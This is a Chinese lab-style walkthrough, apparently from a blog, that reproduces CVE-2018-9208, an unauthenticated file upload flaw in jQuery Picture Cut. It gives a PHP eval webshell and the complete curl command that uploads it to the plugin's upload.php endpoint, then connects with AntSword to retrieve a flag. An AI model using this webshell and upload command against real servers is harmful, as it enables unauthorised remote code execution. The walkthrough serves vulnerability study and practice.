当前位置: 首页 > news >正文

jquery-picture-cut 任意文件上传(CVE-2018-9208)

目录

1、漏洞描述

2、访问ip:port

3、一句话木马:exploit.php

4、上传一句话木马

5、中国蚁剑连接成功

6、拿到flag


1、漏洞描述

        jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Picture Cut <= v1.1Beta 中未经身份验证的任意文件上传漏洞 复现参考链接:http://www.vapidlabs.com/advisory.php?v=207

2、访问ip:port

3、一句话木马:exploit.php

<?php @eval($_POST['a']);?>

4、上传一句话木马

curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@exploit.php" http://IP:PORT/jquery-picture-cut/src/php/upload.php

5、中国蚁剑连接成功

6、拿到flag


http://www.mrgr.cn/news/78097.html

相关文章:

  • 五天SpringCloud计划——DAY1之mybatis-plus的使用
  • 泷羽sec-linux
  • 【Android+多线程】IntentService 知识总结:应用场景 / 使用步骤 / 源码分析
  • 【数据结构】【线性表】一文讲完队列(附C语言源码)
  • leetcode 50个简单和中等难度的题
  • LSA详情与特殊区域
  • python oa服务器巡检报告脚本的重构和修改(适应数盾OTP)有空再去改
  • C++ static关键字
  • 利用processR软件包实现简单的中介效应模型
  • 【分治】--- 快速选择算法
  • 解决数据传送问题:内网http传输
  • 多模态大型语言模型(MLLM)综述
  • 【R安装】R语言的详细安装及环境配置(2024年11月)
  • Wordcloud也能生成一个,带html的词云图文件吗??
  • Flink中普通API的使用
  • 一篇文章了解Linux
  • 临床检验项目指标学习笔记
  • 【JUC-Interrupt】中断相关概念
  • 低代码开发平台搭建思考与实战
  • 嵌入式入门Day17
  • 【数据结构】链表的基本操作
  • Tkinter置顶弹窗提示操作成功
  • 分布式搜索引擎Elasticsearch(一)
  • Maven学习笔记
  • 设计模式——抽象工厂模式
  • 报表工具功能对比:免费易上手的山海鲸报表 vs 庞大用户群体的Tableau